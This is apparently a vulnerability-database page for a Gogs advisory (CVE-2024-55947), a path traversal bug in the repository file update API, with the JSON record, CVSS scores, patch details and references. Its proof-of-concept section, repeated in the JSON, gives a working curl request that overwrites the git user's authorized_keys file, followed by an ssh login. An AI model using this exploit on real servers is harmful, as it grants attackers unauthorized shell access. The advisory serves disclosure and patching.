GHSA-QF5V-RP47-55GG

Vulnerability from github – Published: 2024-12-23 17:53 – Updated: 2025-04-10 22:56
VLAI?
Summary
Path Traversal in file update API in gogs
Details

Impact

The malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server.

Patches

Writing files outside repository Git directory has been prohibited via the repository file update API (https://github.com/gogs/gogs/pull/7859). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.

Workarounds

No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.

References

n/a

Proof of Concept

  1. Generate a Personal Access Tokens

  2. Edit any file on the server with this

    bash curl -v --path-as-is -X PUT --url "http://localhost:10880/api/v1/repos/Test/bbcc/contents/../../../../../../../../home/git/.ssh/authorized_keys" \ -H "Authorization: token eaac23cf58fc76bbaecd686ec52cd44d903db9bf" \ -H "Content-Type: application/json" \ --data '{ "message": "an", "content": "<base64encoded: your ssh pub key>" }'

  3. ssh connect to remote server

    bash ssh -i temp git@localhost -p 10022

For more information

If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.13.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-55947"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-12-23T17:53:16Z",
    "nvd_published_at": "2024-12-23T16:15:07Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. \n\n### Patches\n\nWriting files outside repository Git directory has been prohibited via the repository file update API (https://github.com/gogs/gogs/pull/7859). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.\n\n### Workarounds\n\nNo viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.\n\n### References\n\nn/a\n\n### Proof of Concept\n\n1. Generate a Personal Access Tokens\n2. Edit any file on the server with this\n\n    ```bash\n    curl -v --path-as-is -X PUT --url \"http://localhost:10880/api/v1/repos/Test/bbcc/contents/../../../../../../../../home/git/.ssh/authorized_keys\" \\\n    -H \"Authorization: token eaac23cf58fc76bbaecd686ec52cd44d903db9bf\" \\\n    -H \"Content-Type: application/json\" \\\n    --data \u0027{\n      \"message\": \"an\",\n      \"content\": \"\u003cbase64encoded: your ssh pub key\u003e\"\n    }\u0027\n    ```\n\n3. ssh connect to remote server\n\n    ```bash\n    ssh -i temp git@localhost -p 10022\n    ```\n\n### For more information\nIf you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.",
  "id": "GHSA-qf5v-rp47-55gg",
  "modified": "2025-04-10T22:56:52Z",
  "published": "2024-12-23T17:53:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-qf5v-rp47-55gg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55947"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/issues/7582"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/7859"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/9a9388ace25bd646f5098cb9193d983332c34e41"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Path Traversal in file update API in gogs"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.